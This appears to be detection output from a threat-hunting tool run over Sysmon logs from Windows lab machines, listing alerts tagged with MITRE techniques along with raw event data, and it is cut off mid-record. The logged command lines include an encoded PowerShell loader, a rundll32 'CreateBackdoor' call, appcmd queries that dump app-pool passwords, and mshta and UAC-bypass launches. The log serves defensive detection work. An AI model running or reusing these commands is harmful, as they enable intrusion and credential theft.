+ 0x8000000000000000 + + + 7649 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-06-15 07:13:42.577 + 365ABB72-9AA6-5D04-0000-00109C850F00 + 652 + C:\Windows\System32\mshta.exe + IEWIN7\IEUser + tcp + true + false + 10.0.2.13 + IEWIN7 + 49159 + + false + 10.0.2.18 + + 4443 + + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1562186370.254733,2019-07-04T00:39:30.254733+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8352 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-07-03 20:39:30.254 + 365ABB72-1282-5D1D-0000-0010DD401B00 + 2328 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-0A6F-5D1D-0000-0020CA350100 + 0x135ca + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-1256-5D1D-0000-0010FB1A1B00 + 1632 + C:\Windows\System32\notepad.exe + "C:\Windows\system32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1562186370.254733,2019-07-04T00:39:30.254733+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8352 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-07-03 20:39:30.254 + 365ABB72-1282-5D1D-0000-0010DD401B00 + 2328 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-0A6F-5D1D-0000-0020CA350100 + 0x135ca + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-1256-5D1D-0000-0010FB1A1B00 + 1632 + C:\Windows\System32\notepad.exe + "C:\Windows\system32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1562186370.254733,2019-07-04T00:39:30.254733+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 8352 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-07-03 20:39:30.254 + 365ABB72-1282-5D1D-0000-0010DD401B00 + 2328 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32.exe + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-0A6F-5D1D-0000-0020CA350100 + 0x135ca + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-1256-5D1D-0000-0010FB1A1B00 + 1632 + C:\Windows\System32\notepad.exe + "C:\Windows\system32\notepad.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436009.341503,2019-07-30T01:33:29.341503+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4917 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:28.222 + 747F3D96-6628-5D3F-0000-001062788800 + 2040 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.202039,2019-05-27T05:29:18.202039+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5916 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.161 + 365ABB72-3D6E-5CEB-0000-0010CC8AFF00 + 2524 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.224263,2020-03-21T09:00:25.224263+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243540 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.029 + 747F3D96-9F69-5E75-0000-0010946B2000 + 1828 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( IEWIN7..home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 104.20.208.21 ) and port ( 80 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 16794 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 18:35:04.463 + 365ABB72-6759-5CD8-0000-0010E2D50F00 + 1420 + C:\Windows\System32\regsvr32.exe + IEWIN7\IEUser + tcp + true + false + 10.0.2.15 + IEWIN7..home + 49165 + + false + 104.20.208.21 + + 80 + http + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.224263,2020-03-21T09:00:25.224263+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243540 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.029 + 747F3D96-9F69-5E75-0000-0010946B2000 + 1828 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1218.005 ] Mshta found running in the system,1560582824.106609,2019-06-15T11:13:44.106609+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta") and Parent Image :C:\Program Files\Internet Explorer\iexplore.exe , Parent CommandLine ("C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html) in directory : ( C:\Users\IEUser\Desktop\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 7648 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-06-15 07:13:42.278 + 365ABB72-9AA6-5D04-0000-00109C850F00 + 652 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + "C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta" + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-98E4-5D04-0000-0020A4350100 + 0x135a4 + 1 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-9972-5D04-0000-0010F0490C00 + 3660 + C:\Program Files\Internet Explorer\iexplore.exe + "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\SysWOW64\cmd.exe ) through command line ( cmd /c ping 127.0.0.1&&del del /F /Q /A:H "C:\Users\IEUser\AppData\Roaming\wwlib.dll" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 417085 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-10-17 11:43:49.217 + 747F3D96-D8F5-5F8A-0000-00106B6F7300 + 1680 + C:\Windows\SysWOW64\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + cmd /c ping 127.0.0.1&&del del /F /Q /A:H "C:\Users\IEUser\AppData\Roaming\wwlib.dll" + C:\Users\IEUser\AppData\Roaming\ + MSEDGEWIN10\IEUser + 747F3D96-CA8D-5F8A-0000-0020D1090A00 + 0xa09d1 + 1 + High + SHA1=E2EAD0993B917E1828A658ADA0B87E01D5B8424F,MD5=C43699F84A68608E7E57C43B7761BBB8,SHA256=2EDB180274A51C83DDF8414D99E90315A9047B18C51DFD070326214D4DA59651,IMPHASH=392B4D61B1D1DADC1F06444DF258188A + 747F3D96-D8E5-5F8A-0000-0010E1BC7200 + 2920 + C:\Users\IEUser\AppData\Roaming\WINWORD.exe + C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564436008.374373,2019-07-30T01:33:28.374373+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4916 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:28.197 + 747F3D96-6628-5D3F-0000-001067768800 + 1296 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.224263,2020-03-21T09:00:25.224263+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243540 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.029 + 747F3D96-9F69-5E75-0000-0010946B2000 + 1828 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1560582824.106609,2019-06-15T11:13:44.106609+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta" ) contain suspicious command ( \mshta.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 7648 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-06-15 07:13:42.278 + 365ABB72-9AA6-5D04-0000-00109C850F00 + 652 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + "C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta" + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-98E4-5D04-0000-0020A4350100 + 0x135a4 + 1 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-9972-5D04-0000-0010F0490C00 + 3660 + C:\Program Files\Internet Explorer\iexplore.exe + "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1088] Bypass User Account Control - Process,1555606626.954307,2019-04-18T20:57:06.954307+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\mmc.exe ) through command line ( "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 15 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1088,technique_name=Bypass User Account Control + 2019-04-18 16:57:04.500 + 365ABB72-AC60-5CB8-0000-001037BA0800 + 3900 + C:\Windows\System32\mmc.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft Management Console + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-AB27-5CB8-0000-002021CA0000 + 0xca21 + 1 + High + SHA1=98D8C5E38510C6220F42747D15F6FFF75DD59845,MD5=A2A5D487D0C3D55739A0491B6872480D,SHA256=40E2B83F07771D54CE4E45B76A14883D042766FF4E1E7872E482EC91E81E9484,IMPHASH=6D2ED4ADDAC7EBAE62381320D82AC4C1 + 365ABB72-AC60-5CB8-0000-001002B30800 + 3904 + C:\Windows\System32\eventvwr.exe + "C:\Windows\system32\eventvwr.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1170] Detecting Mshta,1560582824.106609,2019-06-15T11:13:44.106609+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta") and Parent Image :C:\Program Files\Internet Explorer\iexplore.exe , Parent CommandLine ("C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html) in directory : ( C:\Users\IEUser\Desktop\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 7648 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-06-15 07:13:42.278 + 365ABB72-9AA6-5D04-0000-00109C850F00 + 652 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + "C:\Windows\System32\mshta.exe" "C:\Users\IEUser\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\S97WTYG7\update.hta" + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-98E4-5D04-0000-0020A4350100 + 0x135a4 + 1 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-9972-5D04-0000-0010F0490C00 + 3660 + C:\Program Files\Internet Explorer\iexplore.exe + "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\IEUser\Downloads\update.html + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920558.121924,2019-05-27T05:29:18.121924+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5913 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:18.081 + 365ABB72-3D6E-5CEB-0000-00100C87FF00 + 2896 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAG